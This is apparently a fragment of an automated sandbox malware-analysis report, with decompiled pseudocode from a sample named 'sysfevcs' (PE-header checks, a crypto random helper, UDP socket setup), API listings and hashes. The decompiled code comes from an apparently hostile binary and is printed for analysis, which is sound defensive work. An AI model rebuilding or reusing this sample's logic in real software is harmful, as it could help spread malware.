                                                                                                                                                                                                                                                                  											if( *_t69 == _t110) {
                                                                                                                                                                                                                                                                  												goto L51;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											_t93 = _t93 - 1;
                                                                                                                                                                                                                                                                  											_t69 = _t69 - 4;
                                                                                                                                                                                                                                                                  											__eflags = _t93;
                                                                                                                                                                                                                                                                  											if(_t93 > 0) {
                                                                                                                                                                                                                                                                  												continue;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											goto L51;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L51;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_t87 = _v32;
                                                                                                                                                                                                                                                                  									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                                                                                  									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                                                                                  										goto L59;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                                                                                  									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                                                                                  									if( *_t71 != 0x4550) {
                                                                                                                                                                                                                                                                  										goto L59;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                                                                                  									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                                                                                  										goto L59;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_t78 = _t76 - _t87;
                                                                                                                                                                                                                                                                  									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                                                                                  									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                                                                                  									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                                                                                  										goto L59;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                                                                                  									__eflags = _t78 - _t72;
                                                                                                                                                                                                                                                                  									if(_t78 < _t72) {
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                                                                                  									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                                                                                  									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                                                                                  										goto L20;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									goto L46;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								goto L16;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							while(1) {
                                                                                                                                                                                                                                                                  								L16:
                                                                                                                                                                                                                                                                  								__eflags =  *((intOrPtr*)(0x4141f8 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)(0x4141f8 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t58 = _t58 + 1;
                                                                                                                                                                                                                                                                  								__eflags = _t58 - _t81;
                                                                                                                                                                                                                                                                  								if(_t58 < _t81) {
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								goto L18;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							__eflags = _t58;
                                                                                                                                                                                                                                                                  							if(_t58 <= 0) {
                                                                                                                                                                                                                                                                  								goto L5;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							 *0x414238 = 1;
                                                                                                                                                                                                                                                                  							__eflags =  *0x414238;
                                                                                                                                                                                                                                                                  							if( *0x414238 != 0) {
                                                                                                                                                                                                                                                                  								goto L5;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							__eflags =  *((intOrPtr*)(0x4141f8 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)(0x4141f8 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                  								L32:
                                                                                                                                                                                                                                                                  								_t100 = 0;
                                                                                                                                                                                                                                                                  								__eflags = _t58;
                                                                                                                                                                                                                                                                  								if(_t58 < 0) {
                                                                                                                                                                                                                                                                  									L34:
                                                                                                                                                                                                                                                                  									 *0x414238 = 0;
                                                                                                                                                                                                                                                                  									goto L5;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									goto L33;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									L33:
                                                                                                                                                                                                                                                                  									_t90 = 0x4141f8 + _t100 * 4;
                                                                                                                                                                                                                                                                  									_t100 = _t100 + 1;
                                                                                                                                                                                                                                                                  									__eflags = _t100 - _t58;
                                                                                                                                                                                                                                                                  									 *_t90 = _t110;
                                                                                                                                                                                                                                                                  									_t110 =  *_t90;
                                                                                                                                                                                                                                                                  								} while (_t100 <= _t58);
                                                                                                                                                                                                                                                                  								goto L34;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t58 = _t81 - 1;
                                                                                                                                                                                                                                                                  							__eflags = _t58;
                                                                                                                                                                                                                                                                  							if(_t58 < 0) {
                                                                                                                                                                                                                                                                  								L28:
                                                                                                                                                                                                                                                                  								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                                                                  								if(_t81 < 0x10) {
                                                                                                                                                                                                                                                                  									_t81 = _t81 + 1;
                                                                                                                                                                                                                                                                  									__eflags = _t81;
                                                                                                                                                                                                                                                                  									 *0x4141f0 = _t81;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t58 = _t81 - 1;
                                                                                                                                                                                                                                                                  								goto L32;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								goto L25;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							while(1) {
                                                                                                                                                                                                                                                                  								L25:
                                                                                                                                                                                                                                                                  								__eflags =  *((intOrPtr*)(0x4141f8 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)(0x4141f8 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t58 = _t58 - 1;
                                                                                                                                                                                                                                                                  								__eflags = _t58;
                                                                                                                                                                                                                                                                  								if(_t58 >= 0) {
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							__eflags = _t58;
                                                                                                                                                                                                                                                                  							if(__eflags >= 0) {
                                                                                                                                                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                                                                                                                                                  									goto L34;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								goto L32;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L28;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                                                                  						__eflags = _t75 - _v8;
                                                                                                                                                                                                                                                                  						if(_t75 < _v8) {
                                                                                                                                                                                                                                                                  							goto L20;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						__eflags = _t75 - _t108;
                                                                                                                                                                                                                                                                  						if(_t75 >= _t108) {
                                                                                                                                                                                                                                                                  							goto L20;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L15;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L5:
                                                                                                                                                                                                                                                                  					_t63 = 1;
                                                                                                                                                                                                                                                                  					goto L60;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					goto L3;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}




































                                                                                                                                                                                                                                                                  0x0040ec57
                                                                                                                                                                                                                                                                  0x0040ec5a
                                                                                                                                                                                                                                                                  0x0040ec60
                                                                                                                                                                                                                                                                  0x0040ec7e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ec7e
                                                                                                                                                                                                                                                                  0x0040ec68
                                                                                                                                                                                                                                                                  0x0040ec71
                                                                                                                                                                                                                                                                  0x0040ec77
                                                                                                                                                                                                                                                                  0x0040ec86
                                                                                                                                                                                                                                                                  0x0040ec89
                                                                                                                                                                                                                                                                  0x0040ec8c
                                                                                                                                                                                                                                                                  0x0040ec96
                                                                                                                                                                                                                                                                  0x0040ec96
                                                                                                                                                                                                                                                                  0x0040ec98
                                                                                                                                                                                                                                                                  0x0040ec9b
                                                                                                                                                                                                                                                                  0x0040ec9d
                                                                                                                                                                                                                                                                  0x0040ec9d
                                                                                                                                                                                                                                                                  0x0040ec9f
                                                                                                                                                                                                                                                                  0x0040eca2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040eca4
                                                                                                                                                                                                                                                                  0x0040eca6
                                                                                                                                                                                                                                                                  0x0040ed0c
                                                                                                                                                                                                                                                                  0x0040ed0c
                                                                                                                                                                                                                                                                  0x0040ee6a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee6a
                                                                                                                                                                                                                                                                  0x0040eca8
                                                                                                                                                                                                                                                                  0x0040eca8
                                                                                                                                                                                                                                                                  0x0040ecac
                                                                                                                                                                                                                                                                  0x0040ecae
                                                                                                                                                                                                                                                                  0x0040ecae
                                                                                                                                                                                                                                                                  0x0040ecae
                                                                                                                                                                                                                                                                  0x0040ecae
                                                                                                                                                                                                                                                                  0x0040ecb1
                                                                                                                                                                                                                                                                  0x0040ecb2
                                                                                                                                                                                                                                                                  0x0040ecb5
                                                                                                                                                                                                                                                                  0x0040ecb5
                                                                                                                                                                                                                                                                  0x0040ecb9
                                                                                                                                                                                                                                                                  0x0040ecbd
                                                                                                                                                                                                                                                                  0x0040eccb
                                                                                                                                                                                                                                                                  0x0040eccb
                                                                                                                                                                                                                                                                  0x0040ecd3
                                                                                                                                                                                                                                                                  0x0040ecd9
                                                                                                                                                                                                                                                                  0x0040ecdb
                                                                                                                                                                                                                                                                  0x0040ecdd
                                                                                                                                                                                                                                                                  0x0040eced
                                                                                                                                                                                                                                                                  0x0040ecfa
                                                                                                                                                                                                                                                                  0x0040ecfe
                                                                                                                                                                                                                                                                  0x0040ed03
                                                                                                                                                                                                                                                                  0x0040ed05
                                                                                                                                                                                                                                                                  0x0040ed83
                                                                                                                                                                                                                                                                  0x0040ed83
                                                                                                                                                                                                                                                                  0x0040ed07
                                                                                                                                                                                                                                                                  0x0040ed07
                                                                                                                                                                                                                                                                  0x0040ed07
                                                                                                                                                                                                                                                                  0x0040ed85
                                                                                                                                                                                                                                                                  0x0040ed87
                                                                                                                                                                                                                                                                  0x0040ee68
                                                                                                                                                                                                                                                                  0x0040ee68
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed8d
                                                                                                                                                                                                                                                                  0x0040ed8d
                                                                                                                                                                                                                                                                  0x0040ed94
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed9a
                                                                                                                                                                                                                                                                  0x0040ed9e
                                                                                                                                                                                                                                                                  0x0040edfa
                                                                                                                                                                                                                                                                  0x0040edfc
                                                                                                                                                                                                                                                                  0x0040ee04
                                                                                                                                                                                                                                                                  0x0040ee06
                                                                                                                                                                                                                                                                  0x0040ee08
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee0a
                                                                                                                                                                                                                                                                  0x0040ee10
                                                                                                                                                                                                                                                                  0x0040ee12
                                                                                                                                                                                                                                                                  0x0040ee14
                                                                                                                                                                                                                                                                  0x0040ee29
                                                                                                                                                                                                                                                                  0x0040ee29
                                                                                                                                                                                                                                                                  0x0040ee2b
                                                                                                                                                                                                                                                                  0x0040ee5a
                                                                                                                                                                                                                                                                  0x0040ee61
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee61
                                                                                                                                                                                                                                                                  0x0040ee2f
                                                                                                                                                                                                                                                                  0x0040ee30
                                                                                                                                                                                                                                                                  0x0040ee32
                                                                                                                                                                                                                                                                  0x0040ee34
                                                                                                                                                                                                                                                                  0x0040ee34
                                                                                                                                                                                                                                                                  0x0040ee36
                                                                                                                                                                                                                                                                  0x0040ee38
                                                                                                                                                                                                                                                                  0x0040ee3a
                                                                                                                                                                                                                                                                  0x0040ee4e
                                                                                                                                                                                                                                                                  0x0040ee4e
                                                                                                                                                                                                                                                                  0x0040ee51
                                                                                                                                                                                                                                                                  0x0040ee53
                                                                                                                                                                                                                                                                  0x0040ee53
                                                                                                                                                                                                                                                                  0x0040ee54
                                                                                                                                                                                                                                                                  0x0040ee54
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee3c
                                                                                                                                                                                                                                                                  0x0040ee3c
                                                                                                                                                                                                                                                                  0x0040ee3c
                                                                                                                                                                                                                                                                  0x0040ee45
                                                                                                                                                                                                                                                                  0x0040ee46
                                                                                                                                                                                                                                                                  0x0040ee48
                                                                                                                                                                                                                                                                  0x0040ee4a
                                                                                                                                                                                                                                                                  0x0040ee4a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee3c
                                                                                                                                                                                                                                                                  0x0040ee3a
                                                                                                                                                                                                                                                                  0x0040ee16
                                                                                                                                                                                                                                                                  0x0040ee1d
                                                                                                                                                                                                                                                                  0x0040ee1d
                                                                                                                                                                                                                                                                  0x0040ee1f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee21
                                                                                                                                                                                                                                                                  0x0040ee22
                                                                                                                                                                                                                                                                  0x0040ee25
                                                                                                                                                                                                                                                                  0x0040ee27
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee27
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee1d
                                                                                                                                                                                                                                                                  0x0040eda0
                                                                                                                                                                                                                                                                  0x0040eda3
                                                                                                                                                                                                                                                                  0x0040eda8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edb1
                                                                                                                                                                                                                                                                  0x0040edb3
                                                                                                                                                                                                                                                                  0x0040edb9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edbf
                                                                                                                                                                                                                                                                  0x0040edc5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edcb
                                                                                                                                                                                                                                                                  0x0040edcd
                                                                                                                                                                                                                                                                  0x0040edd6
                                                                                                                                                                                                                                                                  0x0040edda
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ede0
                                                                                                                                                                                                                                                                  0x0040ede3
                                                                                                                                                                                                                                                                  0x0040ede5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edec
                                                                                                                                                                                                                                                                  0x0040edee
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edf0
                                                                                                                                                                                                                                                                  0x0040edf4
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edf4
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ecdf
                                                                                                                                                                                                                                                                  0x0040ecdf
                                                                                                                                                                                                                                                                  0x0040ecdf
                                                                                                                                                                                                                                                                  0x0040ece6
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ece8
                                                                                                                                                                                                                                                                  0x0040ece9
                                                                                                                                                                                                                                                                  0x0040eceb
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040eceb
                                                                                                                                                                                                                                                                  0x0040ed13
                                                                                                                                                                                                                                                                  0x0040ed15
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed25
                                                                                                                                                                                                                                                                  0x0040ed27
                                                                                                                                                                                                                                                                  0x0040ed29
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed2f
                                                                                                                                                                                                                                                                  0x0040ed36
                                                                                                                                                                                                                                                                  0x0040ed62
                                                                                                                                                                                                                                                                  0x0040ed62
                                                                                                                                                                                                                                                                  0x0040ed64
                                                                                                                                                                                                                                                                  0x0040ed66
                                                                                                                                                                                                                                                                  0x0040ed7a
                                                                                                                                                                                                                                                                  0x0040ed7c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed68
                                                                                                                                                                                                                                                                  0x0040ed68
                                                                                                                                                                                                                                                                  0x0040ed68
                                                                                                                                                                                                                                                                  0x0040ed71
                                                                                                                                                                                                                                                                  0x0040ed72
                                                                                                                                                                                                                                                                  0x0040ed74
                                                                                                                                                                                                                                                                  0x0040ed76
                                                                                                                                                                                                                                                                  0x0040ed76
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed68
                                                                                                                                                                                                                                                                  0x0040ed38
                                                                                                                                                                                                                                                                  0x0040ed3b
                                                                                                                                                                                                                                                                  0x0040ed3d
                                                                                                                                                                                                                                                                  0x0040ed4f
                                                                                                                                                                                                                                                                  0x0040ed4f
                                                                                                                                                                                                                                                                  0x0040ed52
                                                                                                                                                                                                                                                                  0x0040ed54
                                                                                                                                                                                                                                                                  0x0040ed54
                                                                                                                                                                                                                                                                  0x0040ed55
                                                                                                                                                                                                                                                                  0x0040ed55
                                                                                                                                                                                                                                                                  0x0040ed5b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed3f
                                                                                                                                                                                                                                                                  0x0040ed3f
                                                                                                                                                                                                                                                                  0x0040ed3f
                                                                                                                                                                                                                                                                  0x0040ed46
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed48
                                                                                                                                                                                                                                                                  0x0040ed48
                                                                                                                                                                                                                                                                  0x0040ed49
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed49
                                                                                                                                                                                                                                                                  0x0040ed4b
                                                                                                                                                                                                                                                                  0x0040ed4d
                                                                                                                                                                                                                                                                  0x0040ed60
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed60
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed4d
                                                                                                                                                                                                                                                                  0x0040ecbf
                                                                                                                                                                                                                                                                  0x0040ecc2
                                                                                                                                                                                                                                                                  0x0040ecc5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ecc7
                                                                                                                                                                                                                                                                  0x0040ecc9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ecc9
                                                                                                                                                                                                                                                                  0x0040ec8e
                                                                                                                                                                                                                                                                  0x0040ec90
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 0040ECFE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                                                  • String ID: 8BA$8BA$8BA
                                                                                                                                                                                                                                                                  • API String ID: 2850889275-2911327915
                                                                                                                                                                                                                                                                  • Opcode ID: 1fc1e9e51b8d3a755360d72960d4b34ea433d7ab73e8c8e3fbb0d1fce81ebb19
                                                                                                                                                                                                                                                                  • Instruction ID: 53aac2a77a9f56d9b5b49871b8f1364076886e856ea69bd72e3e10827216548d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fc1e9e51b8d3a755360d72960d4b34ea433d7ab73e8c8e3fbb0d1fce81ebb19
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F861DA31600606DFEB29CF2BC98466673A1EF95354B248D7BD806E72D1E339DC92C69C
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                                                                                                                  			E0040A590(void* __ecx, BYTE* _a4, int _a8) {
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  				char* _t6;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t1 =  &_v8; // 0x406269
                                                                                                                                                                                                                                                                  				_t6 = _t1;
                                                                                                                                                                                                                                                                  				__imp__CryptAcquireContextW(_t6, 0, 0, 1, 0xf0000040, __ecx);
                                                                                                                                                                                                                                                                  				if(_t6 != 0) {
                                                                                                                                                                                                                                                                  					_t4 =  &_v8; // 0x406269
                                                                                                                                                                                                                                                                  					CryptGenRandom( *_t4, _a8, _a4);
                                                                                                                                                                                                                                                                  					_t5 =  &_v8; // 0x406269
                                                                                                                                                                                                                                                                  					return CryptReleaseContext( *_t5, 0);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t6;
                                                                                                                                                                                                                                                                  			}





                                                                                                                                                                                                                                                                  0x0040a59f
                                                                                                                                                                                                                                                                  0x0040a59f
                                                                                                                                                                                                                                                                  0x0040a5a3
                                                                                                                                                                                                                                                                  0x0040a5ab
                                                                                                                                                                                                                                                                  0x0040a5b5
                                                                                                                                                                                                                                                                  0x0040a5b9
                                                                                                                                                                                                                                                                  0x0040a5c1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040a5c5
                                                                                                                                                                                                                                                                  0x0040a5ce

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CryptAcquireContextW.ADVAPI32(ib@,00000000,00000000,00000001,F0000040,?,?,0040A5E9,ib@,00000004,?,?,0040A61E,000000FF), ref: 0040A5A3
                                                                                                                                                                                                                                                                  • CryptGenRandom.ADVAPI32(ib@,?,00000000,?,?,0040A5E9,ib@,00000004,?,?,0040A61E,000000FF), ref: 0040A5B9
                                                                                                                                                                                                                                                                  • CryptReleaseContext.ADVAPI32(ib@,00000000,?,?,0040A5E9,ib@,00000004,?,?,0040A61E,000000FF), ref: 0040A5C5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                                                  • String ID: ib@
                                                                                                                                                                                                                                                                  • API String ID: 1815803762-2572181768
                                                                                                                                                                                                                                                                  • Opcode ID: 19638542191e3fb3c25dfebe44d0539c5debb8449ecbe4532cb7510c5fe412a5
                                                                                                                                                                                                                                                                  • Instruction ID: e86f9f2f6962971676cdee64fe7ddd258c269ae68294ba7c70f801d1bcef9814
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19638542191e3fb3c25dfebe44d0539c5debb8449ecbe4532cb7510c5fe412a5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EE01275650208BBDB24CBD1DD49F9A776CAB48700F104174BB09E7280DA75EA048768
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 22%
                                                                                                                                                                                                                                                                  			E0040DA90(void* __edi) {
                                                                                                                                                                                                                                                                  				short _v14;
                                                                                                                                                                                                                                                                  				short _v18;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				short _v22;
                                                                                                                                                                                                                                                                  				short _v26;
                                                                                                                                                                                                                                                                  				char _v28;
                                                                                                                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                                                                                                                  				void* _t15;
                                                                                                                                                                                                                                                                  				void* _t24;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t27 = __edi;
                                                                                                                                                                                                                                                                  				_t24 = E00408820(0x24);
                                                                                                                                                                                                                                                                  				 *_t24 = 0x756470;
                                                                                                                                                                                                                                                                  				 *(_t24 + 4) = 1;
                                                                                                                                                                                                                                                                  				_t15 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                  				 *(_t24 + 0x10) = _t15;
                                                                                                                                                                                                                                                                  				__imp__#23(2, 2, 0x11);
                                                                                                                                                                                                                                                                  				 *(_t24 + 8) = _t15;
                                                                                                                                                                                                                                                                  				if(_t15 == 0xffffffff) {
                                                                                                                                                                                                                                                                  					E0040DA20(_t24, __edi);
                                                                                                                                                                                                                                                                  					_t24 = 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(_t24 == 0) {
                                                                                                                                                                                                                                                                  					L6:
                                                                                                                                                                                                                                                                  					return _t24;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_v26 = 0;
                                                                                                                                                                                                                                                                  					_v22 = 0;
                                                                                                                                                                                                                                                                  					_v18 = 0;
                                                                                                                                                                                                                                                                  					_v14 = 0;
                                                                                                                                                                                                                                                                  					_v28 = 2;
                                                                                                                                                                                                                                                                  					__imp__#2( *(_t24 + 8),  &_v28, 0x10);
                                                                                                                                                                                                                                                                  					if(2 != 0xffffffff) {
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t24 + 0xc)) = _v20;
